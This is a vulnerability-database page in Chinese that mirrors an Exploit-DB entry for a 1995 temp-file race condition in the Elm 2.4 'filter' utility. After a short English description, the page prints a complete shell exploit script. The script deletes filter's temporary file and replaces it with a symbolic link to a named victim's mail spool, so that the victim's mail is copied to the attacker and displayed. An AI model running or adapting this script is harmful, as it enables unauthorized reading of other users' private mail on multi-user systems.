Elm 2.4 – ‘filter’ Arbitrary Mail Disclosure

Elm 2.4 – ‘filter’ Arbitrary Mail Disclosure

漏洞ID 1053338 漏洞类型
发布时间 1995-12-26 更新时间 1995-12-26
图片[1]-Elm 2.4 – ‘filter’ Arbitrary Mail Disclosure-安全小百科CVE编号 N/A
图片[2]-Elm 2.4 – ‘filter’ Arbitrary Mail Disclosure-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/20291
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/1802/info

Elm is a popular Unix mail client. A vulnerability exists in Elm's 'filter' utility which can grant an attacker access to any user's mail spool. By exploiting a race condition which exists in the creation of temporary files, an unauthorized user can delete an open temporary file and replace it with a symbolic link pointing to any other user's mail spool. The mailmessage function will then follow this link, and copy the contents of the victim's mail file to that of the attacker. The obvious result is that the attacker is able to read the victim's mail messages.


#!/bin/sh
# This shell script exploits a problem with filter(1L)
# it will follow symbolic links, on a read allowing
# us to steal a users mail file.
#
# Usage: fread.sh victimsusername
#
# Contents will be stored in ~/victimsusername.mail
#
# Dave M. ([email protected] <mailto:[email protected]>)
#

cp /var/spool/mail/$LOGNAME ~
cp /dev/null /var/spool/mail/$LOGNAME
echo 'if (always) forward' $LOGNAME > /tmp/fread-ftr.tmp

cat << _EOF_ >> /tmp/fread-msg.tmp
From: Dave
To: $LOGNAME
Subject: Filter Exploit

_EOF_

echo sleep 2 > /tmp/fread-sh.tmp
echo cat /tmp/fread-msg.tmp >> /tmp/fread-sh.tmp
chmod +x /tmp/fread-sh.tmp
/tmp/fread-sh.tmp|filter -f /tmp/fread-ftr.tmp &
FREAD=`ps|grep 'filter -f'|grep -v grep|awk '{print $1}'`
rm -f /tmp/filter.$FREAD
ln -s /var/spool/mail/$1 /tmp/filter.$FREAD
sleep 2
rm -f /tmp/fread-ftr.tmp /tmp/fread-msg.tmp /tmp/fread-sh.tmp
/tmp/fread-ftr.tmp /tmp/filter.$FREAD
FREAD=
cp /var/spool/mail/$LOGNAME ~/$1.mail
cp ~/$LOGNAME /var/spool/mail
more ~/$1.mail

相关推荐: phf Remote Command Execution Vulnerability

phf Remote Command Execution Vulnerability 漏洞ID 1105120 漏洞类型 Input Validation Error 发布时间 1996-03-20 更新时间 1996-03-20 CVE编号 N/A CNNV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享